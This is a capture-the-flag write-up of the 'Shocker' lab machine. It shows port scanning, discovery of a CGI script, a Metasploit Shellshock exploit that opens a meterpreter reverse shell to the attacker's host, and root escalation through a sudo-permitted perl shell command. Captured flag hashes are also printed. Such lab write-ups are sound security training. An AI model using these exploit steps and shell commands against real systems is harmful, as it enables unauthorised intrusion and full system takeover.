Shocker
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.56
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-21 03:17 EDT
Nmap scan report for 10.10.10.56
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.56 -sV -A -p80,2222
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-21 03:18 EDT
Nmap scan report for 10.10.10.56
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 12.64 secondsOur initial Nmap scan showed that we have 2 ports open → http, and another port called EtherNetIP. However after a more in depth scan, we are able to identify port 2222 as basically ssh. Since we have no credentials, we will go into port 80 and see if there are any interesting things inside:
HTTP
Navigating over into the website, we are able to see a webpage with an image “Don’t Bug Me!”. From there, we see an 404 error when trying to obtain the /favicon.co and it shows that this web server is running Apache/2.4.18. We will try to use Dirbuster to see if we are able to find any useful pages:
From the initial scan, we are able to find 2 directories:
Scanning further in cgi-bin, we are able to identify user.sh. Based on this, we can assume that a potential vulnerability we can abuse is shellshock, which can be ran in metasploit.
Initial Access
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the
makerc command
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \\
<`- :
(__ <__. ;
`-. '-.__. _.' /
\\ `-.__,-' _,'
`._ , /__,-'
""._\\__,'< <____
| | `----.`.
| | \\ `.
; |___ \\-``
\\ --<
`.`.<
`-''
=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: <https://docs.metasploit.com/>
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 \\_ target: Linux x86 . . . .
3 \\_ target: Linux x86_64 . . . .
4 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
5 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
6 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
7 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
8 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
9 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
10 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
11 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
12 \\_ target: Linux x86 . . . .
13 \\_ target: Linux x86_64 . . . .
14 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
15 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 15, use 15 or use exploit/multi/misc/xdh_x_exec
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/bas>
ics/using-metasploit.html
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the loc
al machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.106.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.56:40320) at 2024-10-21 04:11:45 -0400
meterpreter > shell
Process 1530 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
shelly@Shocker:/usr/lib/cgi-bin$ cd /
cd /
shelly@Shocker:/$ cd /home
cd /home
shelly@Shocker:/home$ cd shelly
cd shelly
shelly@Shocker:~$ ls -la
ls -la
total 36
drwxr-xr-x 4 shelly shelly 4096 Sep 21 2022 .
drwxr-xr-x 3 root root 4096 Sep 21 2022 ..
lrwxrwxrwx 1 root root 9 Sep 21 2022 .bash_history -> /dev/null
-rw-r--r-- 1 shelly shelly 220 Sep 22 2017 .bash_logout
-rw-r--r-- 1 shelly shelly 3771 Sep 22 2017 .bashrc
drwx------ 2 shelly shelly 4096 Sep 21 2022 .cache
drwxrwxr-x 2 shelly shelly 4096 Sep 21 2022 .nano
-rw-r--r-- 1 shelly shelly 655 Sep 22 2017 .profile
-rw-r--r-- 1 root root 66 Sep 22 2017 .selected_editor
-r--r--r-- 1 root root 33 Oct 21 03:17 user.txt
shelly@Shocker:~$ cat user.txt
9035239845165600291c13d036f2db5a9035239845165600291c13d036f2db5a
Privilege Escalation
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
# whoami
whoami
rootLol average sudo -l experience. Anyways, after running sudo -l, we are able to identify that our user shelly can run NOPASSWD root on /usr/bin/perl. A quick google search found this: https://gtfobins.github.io/gtfobins/perl/ writeup which explains we can spawn an interactive shell by running perl -e 'exe "/bin/sh";'. After running that, we are able to get root access into the system.
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
# whoami
whoami
root
# cd /
cd /
# cd root
cd root
# ls
ls
root.txt
# cat root.txt
cat root.txt
36922f38b3edab38bdd9f25e813758e836922f38b3edab38bdd9f25e813758e8
Last updated
